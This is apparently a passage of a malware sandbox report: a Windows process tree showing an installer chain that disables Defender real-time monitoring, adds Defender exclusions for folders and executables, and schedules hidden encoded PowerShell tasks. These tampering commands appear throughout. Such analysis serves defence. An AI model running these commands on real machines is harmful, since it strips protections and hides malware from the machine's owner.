        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2192,1005799696380133459,2650119425043446505,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11; Mobile; rv:120.0) Gecko/120.0 Firefox/120.0" --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
        7⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,1005799696380133459,2650119425043446505,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11; Mobile; rv:120.0) Gecko/120.0 Firefox/120.0" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2648 /prefetch:8
        7⤵
        
        PID:564
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2192,1005799696380133459,2650119425043446505,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11; Mobile; rv:120.0) Gecko/120.0 Firefox/120.0" --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2568 /prefetch:1
        7⤵
        
        PID:900
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2192,1005799696380133459,2650119425043446505,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 11; Mobile; rv:120.0) Gecko/120.0 Firefox/120.0" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2224 /prefetch:2
        7⤵
        
        PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\L8rKBB1R\FSUPySqo7.exe
      C:\Users\Admin\AppData\Local\Temp\L8rKBB1R\FSUPySqo7.exe -eywhbg73luze
      4⤵
      PID:2924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\AXnAavN8\OguzX1Rm.exe"
      4⤵
      PID:268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\AXnAavN8\OguzX1Rm.exe"
        5⤵
        
        PID:2920
  - - C:\Users\Admin\AppData\Local\Temp\AXnAavN8\OguzX1Rm.exe
      C:\Users\Admin\AppData\Local\Temp\AXnAavN8\OguzX1Rm.exe /did=757674 /S
      4⤵
      PID:2084
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:2596
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:2664
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:2200
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:2588
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:2552
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gTNUApqdi" /SC once /ST 13:59:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:2808
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gTNUApqdi"
        5⤵
        
        PID:2720
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gTNUApqdi"
        5⤵
        
        PID:1872
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "blCcUBBVTLZSBUutEK" /SC once /ST 16:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\CNBkWrcKTEwSAUrTi\iMkRCuwKpnLyWCE\VNYuGar.exe\" Ul /Ytsite_idsyd 757674 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:2200
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /Query
    3⤵
    PID:2068

C:\Users\Admin\Documents\cfg.ini_id29100586.exe
"C:\Users\Admin\Documents\cfg.ini_id29100586.exe"
1⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
1⤵
PID:1996
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:2580
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
  2⤵
  PID:1892

C:\Windows\system32\taskeng.exe
taskeng.exe {5D82F8A9-F8BB-48A3-BE74-CE04E54E8A69} S-1-5-21-2952504676-3105837840-1406404655-1000:URUOZWGF\Admin:Interactive:[1]
1⤵
PID:2832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:1728
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2676
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:2948
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:3228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  PID:3924
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:4056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
  2⤵
  PID:1252
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef62c9758,0x7fef62c9768,0x7fef62c9778
    3⤵
    PID:2940
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1140 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:2
    3⤵
    PID:3420
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1552 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:8
    3⤵
    PID:3492
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1676 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:8
    3⤵
    PID:3232
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2316 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:1
    3⤵
    PID:3732
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:1
    3⤵
    PID:780
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2544 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:1
    3⤵
    PID:3044
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2732 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:2
    3⤵
    PID:2332
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3236 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:8
    3⤵
    PID:4028
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1988 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:2
    3⤵
    PID:3948
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4080 --field-trial-handle=1224,i,10508683838068568393,11094312464833865688,131072 /prefetch:8
    3⤵
    PID:1448

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1552

C:\Windows\system32\taskeng.exe
taskeng.exe {2791C9AB-5CC1-4AFB-AD3C-8C5C60330A0B} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1300
- C:\Users\Admin\AppData\Local\Temp\CNBkWrcKTEwSAUrTi\iMkRCuwKpnLyWCE\VNYuGar.exe
  C:\Users\Admin\AppData\Local\Temp\CNBkWrcKTEwSAUrTi\iMkRCuwKpnLyWCE\VNYuGar.exe Ul /Ytsite_idsyd 757674 /S
  2⤵
  PID:780
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gCxoDmyvj" /SC once /ST 07:37:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2536
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gCxoDmyvj"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gCxoDmyvj"
    3⤵
    PID:1116
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:2776
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      PID:2360
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:2244
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      PID:2948
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "glklzIHuf" /SC once /ST 10:51:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:2948
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "glklzIHuf"
    3⤵
    PID:2244
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "glklzIHuf"
    3⤵
    PID:3572
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3596
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3616
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3628
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3648
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3656
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3676
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3684
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3704
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\SbMoIIcxpnRdCIxv\yuOwyODa\PguRUiKwfVlhrJjM.wsf"
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\SbMoIIcxpnRdCIxv\yuOwyODa\PguRUiKwfVlhrJjM.wsf"
    3⤵
    PID:3740
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LnQemByczDGXSRznQCR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3784
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LnQemByczDGXSRznQCR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3804
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QgrmchoiU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3832
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QgrmchoiU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3860
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\THyGLBDMWmGtC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3952
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RyWFfYdkOCUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3908
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RyWFfYdkOCUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3888
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\THyGLBDMWmGtC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3976
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hSGtcpJDEoxU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4004
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hSGtcpJDEoxU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VZNNHYWGFWXOiPVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:4084
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\VZNNHYWGFWXOiPVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:4060
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3112
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3140
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\CNBkWrcKTEwSAUrTi" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3168
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\CNBkWrcKTEwSAUrTi" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3220
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3256
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\SbMoIIcxpnRdCIxv" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3084
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LnQemByczDGXSRznQCR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3284
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LnQemByczDGXSRznQCR" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3308
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QgrmchoiU" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3344
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QgrmchoiU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3328
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RyWFfYdkOCUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3368
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RyWFfYdkOCUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:3420
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\THyGLBDMWmGtC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3448
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hSGtcpJDEoxU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3500
  - - C:\Windows\SysWOW64\reg.exe
